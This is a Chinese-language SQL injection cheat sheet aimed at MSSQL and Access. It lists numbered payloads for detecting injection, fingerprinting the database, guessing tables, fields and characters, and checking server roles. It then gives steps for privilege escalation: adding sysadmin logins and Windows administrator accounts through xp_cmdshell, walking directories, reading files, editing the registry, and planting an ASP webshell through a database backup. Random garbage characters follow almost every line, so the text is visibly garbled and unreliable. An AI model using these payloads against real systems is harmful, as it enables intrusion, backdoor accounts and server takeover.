1.判断是否有注入;and 1=1 ;and 1=2
'|V�"�!R)
2.初步判断是否是mssql ;and user>0 yU]NgG=z:-
/�@-�!JF#g
3.注入参数是字符'and [查询条件] and ''=' Kv��W���{M
�P�0,�@#M&
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �L���q��<#
�I�b3n%�AG
5.判断数据库系统 1S
.~Vh0Q,
T9N][5���\
;and (select count(*) from sysobjects)>0 mssql y�XyL�,R�
Wv�!#B$J~U
;and (select count(*) from msysobjects)>0 access �q9 !)YP+w
<=2\x�JfxB
~Ry�?}5�&:
FY1�
>�{Bn
6.猜数据库 ;and (select Count(*) from [数据库名])>0 9c�QZ`Ex�
5��'=\$O�b
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 [vCZoG8+�>
k'I�s]=�3
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 v��JTdZ p�
6�j��z6�
�
9.(1)猜字段的ascii值(access) xe�9E</�M_
Sb���S*z:�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 V�rDS����N
�.)J7 \z8m
(2)猜字段的ascii值(mssql) �;�Q�e-y|>
�b?S��,%��
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 x UM,"+��h
ot�Tv,T182
10.测试权限结构(mssql) W>$�2��BsO
jN��R�R=0�
�RN2^=�$'.
�HoE��@t-S
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 5eS0
B�{,c
U4`6S43ki�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ;nS�.t_UW.
l�s�Jl+%&8
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- V?pqK��QL0
v__n>*�x��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 3az�yqpwU$
|qe[`x;
%�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- G':wJ�7[]`
l�Rb|GS.h/
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- &!Sq�6<!v2
W&MZ5t�,k=
;and 1=(select IS_MEMBER('db_owner'));-- s}3g+T\l1w
�DA�YR�=s�
��/qf(5Bm
�|A�D"�}�8
11.添加mssql和系统的帐户 B<^yT@�Wc�
ITpo:"X g�
;exec master.dbo.sp_addlogin username;-- )T2V<�3�l
;exec master.dbo.sp_password null,username,password;-- w4I&S�Lm-b
\.�!+'2!m�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- e3T&KyPm?+
N>a. dYX�r
;exec master.dbo.xp_cmdshell 'net user username password ?x�kw~3Yfi
�`4GE��q2%
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ::g�oq�ajV
�lQ5d.}�O&
;exec master.dbo.xp_cmdshell 'net user username password /add';-- o;w�5;Tk�Y
�barY13)$U
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- U1oZ�\M��h
�)I&,�kH)+
,hO*W-a%�1
;iB9\p$�K)
12.(1)遍历目录 �[2~^�~�K�
r1�pj-
���
;create table dirs(paths varchar(100), id int) ,oin�<��K�
:`jB1r��I�
;insert dirs exec master.dbo.xp_dirtree 'c:\' z?H�i
u6c-
� /2s=;tA1
;and (select top 1 paths from dirs)>0 Hsdcv~Xr;l
Sm�7O%V8{p
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �w;
rQ\gj
��JCe�%�;U
HGiO}|�q�:
0R21"]L_�M
(2)遍历目录 3�P,
�ul*e
�S1vUP5�cZ
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- '���?g�F9:
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 T<a/�GE/
":I@�>t{H*
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 JK�jVrx>
@
�>Tf� <8r,
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �#�T�Uu�k�
+�sY8<y@%
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 @r130eLh��
�~DL�-@*&
!_��P-?�u
{�9c_T�!c�
13.mssql中的存储过程 [�gkOwU�=?
=��JW.1�;
xp_regenumvalues 注册表根键, 子键 �<�(E9�U�.
y$,j'B:;4m
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 A�BIQi��[A
�#;(�Q�� \
xp_regread 根键,子键,键值名 �?PSJQ3BC|
SHA6;y+U/~
;exec xp_regread I9ZJ"�2�9�
BD_"w]bqD�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 e~�1$x`�DH
~a� ]R7X7
xp_regwrite 根键,子键, 值名, 值类型, 值 �0l'"i�dra
Ly~s84k_po
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 c�x�_�$`�H
�_8{6&AmIw
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 gyT�3[*�eh
FdE9k\E#/)
xp_regdeletevalue 根键,子键,值名 [+3~w�pU(p
�*7`amF-��
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 j"4]iI+�{"
�hmES@^n!_
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 NGp^/PZ�X0
}n�t�,DG!r
!�#T�M��%w
k:0nj!^4w>
14.mssql的backup创建webshell J�,_IHzO~Z
@"vTz8oY�@
use model �;�/~%D�(�
C�%QC^�,KL
create table cmd(str image); eFz!`a^dX
�52v@zDY��
insert into cmd(str) values (''); J�P�mZ%]wA
Dy|�DQ>�?}
backup database model to disk='c:\l.asp'; ,/Yo1@��U�
K-6+fge��B
p}��MH� LM
<xaB��$�}R
15.mssql内置函数 G&,2>qxK�R
E�Wp'zbW�P
;and (select @@version)>0 获得Windows的版本号 �N�V�G`XL�
�IE�Q6�J}L
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 12�S[m~L%�
N�,?D<NjXl
;and (select user_name())>0 爆当前系统的连接用户 �d�Y$j�g��
�*rm�wTD�"
;and (select db_name())>0 得到当前连接的数据库 9
�:FzSD �
�uTIl} N�
l
�EsE]f��
'k!V!wcD^y
16.简洁的webshell #e5�*Dr�8�
a4D4*=�!G0
use model od`:w[2��\
gL�QbA$�gB
create table cmd(str image); mqv!"rk'�w
}c;h�:CE�#
insert into cmd(str) values (''); HH��ae�rc�
�MnT+p�[.
backup database model to disk='g:\wwwtest\l.asp';
